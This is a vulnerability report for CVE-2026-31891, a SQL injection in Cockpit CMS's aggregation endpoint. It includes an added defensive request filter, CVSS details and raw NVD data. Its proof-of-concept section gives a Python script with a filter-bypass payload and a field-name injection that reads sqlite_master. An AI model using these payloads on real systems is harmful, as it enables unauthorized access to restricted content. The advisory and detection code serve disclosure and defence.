Security Vulnerability Report
CVE-2026-31891 CVSS 7.7 HIGH

CVE-2026-31891

Published: 2026-03-18 04:17:20
Last Modified: 2026-03-20 18:00:38

Description

Cockpit is a headless content management system. Any Cockpit CMS instance running version 2.13.4 or earlier with API access enabled is potentially affected by a SQL Injection vulnerability in the MongoLite Aggregation Optimizer. Any deployment where the `/api/content/aggregate/{model}` endpoint is publicly accessible or reachable by untrusted users may be vulnerable, and attackers in possession of a valid read-only API key (the lowest privilege level) can exploit this vulnerability; no admin access is required. An attacker can inject arbitrary SQL via unsanitized field names in aggregation queries, bypass the `_state=1` published-content filter to access unpublished or restricted content, and extract unauthorized data from the underlying SQLite content database. This vulnerability has been patched in version 2.13.5. The fix applies the same field-name sanitization introduced in v2.13.3 for `toJsonPath()` to the `toJsonExtractRaw()` method in `lib/MongoLite/Aggregation/Optimizer.php`, closing the injection vector in the Aggregation Optimizer.
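An added example, not Cockpit's code or the 2.13.5 patch: a pre-filter that a reverse proxy or middleware could apply to aggregation request bodies on instances still running an affected version, or that can be run over logged bodies for detection. The allowlist pattern, the function names and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Assumed conservative allowlist (not Cockpit's actual rule): dotted identifiers only.
SAFE_FIELD = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z0-9_]+)*")


def unsafe_field_names(node, path="$"):
    """Return (json_path, name) pairs for every key or "$field" reference
    in an aggregation body that falls outside SAFE_FIELD."""
    findings = []
    if isinstance(node, dict):
        for key, value in node.items():
            # Operators such as $project/$match are "$" + identifier.
            name = key[1:] if key.startswith("$") else key
            if not SAFE_FIELD.fullmatch(name):
                findings.append((path, key))
            findings += unsafe_field_names(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            findings += unsafe_field_names(item, f"{path}[{i}]")
    elif isinstance(node, str) and node.startswith("$"):
        # String values beginning with "$" are treated as field references.
        if not SAFE_FIELD.fullmatch(node[1:]):
            findings.append((path, node))
    return findings


def should_block(raw_body):
    """Decision for a proxy or middleware in front of the aggregate endpoint."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return True  # unparseable bodies are rejected, not passed through
    return bool(unsafe_field_names(body))


# Constructed sample bodies (not captured traffic).
BENIGN = '{"aggregate": [{"$project": {"title": "$title", "meta": "$seo.title"}}]}'
SUSPECT = '{"aggregate": [{"$project": {"title\' --": 1}}]}'
```

The check is deliberately strict, so literal string values that start with `$` are also flagged and need review before the rule is enforced rather than only logged.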

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - VULNERABLE
Cockpit CMS <= 2.13.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-31891 PoC - Cockpit CMS SQL Injection
# Requires: Valid read-only API key
# Target: /api/content/aggregate/{model}
import requests
import json

TARGET_URL = "http://target.com/api/content/aggregate/posts"
API_KEY = "your_readonly_api_key"

# PoC 1: Bypass _state filter to access unpublished content
payload = {
    "filter": {
        "$where": "1==1"
    },
    "fields": {
        "title": 1,
        "_state": 1
    },
    "aggregate": [
        {
            "$project": {
                "title": "$title",
                "state": "$_state",
                "content": "$content"
            }
        }
    ]
}

headers = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json"
}

response = requests.post(TARGET_URL, json=payload, headers=headers)
print(f"Status: {response.status_code}")
print(f"Response: {json.dumps(response.json(), indent=2)}")

# PoC 2: Extract data via SQL injection in field names
injection_payload = {
    "aggregate": [
        {
            "$project": {
                "data': 1, (SELECT name FROM sqlite_master WHERE type='table' LIMIT 1))--": 1
            }
        }
    ]
}

response2 = requests.post(TARGET_URL, json=injection_payload, headers=headers)
print(f"Injection Response: {response2.text}")
```

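References

https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.13.5 (Product, Release Notes)
https://github.com/Cockpit-HQ/Cockpit/security/advisories/GHSA-7x5c-vfhj-9628 (Patch, Vendor Advisory)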

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31891", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:19.570", "lastModified": "2026-03-20T18:00:37.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cockpit is a headless content management system. Any Cockpit CMS instance running version 2.13.4 or earlier with API access enabled is potentially affected by a a SQL Injection vulnerability in the MongoLite Aggregation Optimizer. Any deployment where the `/api/content/aggregate/{model}` endpoint is publicly accessible or reachable by untrusted users may be vulnerable, and attackers in possession of a valid read-only API key (the lowest privilege level) can exploit this vulnerability — no admin access is required. An attacker can inject arbitrary SQL via unsanitized field names in aggregation queries, bypass the `_state=1` published-content filter to access unpublished or restricted content, and extract unauthorized data from the underlying SQLite content database. This vulnerability has been patched in version 2.13.5. The fix applies the same field-name sanitization introduced in v2.13.3 for `toJsonPath()` to the `toJsonExtractRaw()` method in `lib/MongoLite/Aggregation/Optimizer.php`, closing the injection vector in the Aggregation Optimizer."}, {"lang": "es", "value": "Cockpit es un sistema de gestión de contenido sin interfaz gráfica. Cualquier instancia de Cockpit CMS que ejecute la versión 2.13.4 o anterior con acceso a la API habilitado es potencialmente afectada por una vulnerabilidad de inyección SQL en el Optimizador de Agregación de MongoLite. Cualquier despliegue donde el endpoint `/api/content/aggregate/{model}` sea accesible públicamente o alcanzable por usuarios no confiables puede ser vulnerable, y los atacantes en posesión de una clave API de solo lectura válida (el nivel de privilegio más bajo) pueden explotar esta vulnerabilidad — no se requiere acceso de administrador. 
Un atacante puede inyectar SQL arbitrario a través de nombres de campo no saneados en consultas de agregación, eludir el filtro de contenido publicado `_state=1` para acceder a contenido no publicado o restringido, y extraer datos no autorizados de la base de datos de contenido SQLite subyacente. Esta vulnerabilidad ha sido parcheada en la versión 2.13.5. La corrección aplica la misma sanitización de nombres de campo introducida en la v2.13.3 para `toJsonPath()` al método `toJsonExtractRaw()` en `lib/MongoLite/Aggregation/Optimizer.php`, cerrando el vector de inyección en el Optimizador de Agregación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.13.5", "matchCriteriaId": "B9672A33-EC5F-4489-892D-A63C0499AE5F"}]}]}], "references": [{"url": 
"https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.13.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/Cockpit-HQ/Cockpit/security/advisories/GHSA-7x5c-vfhj-9628", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}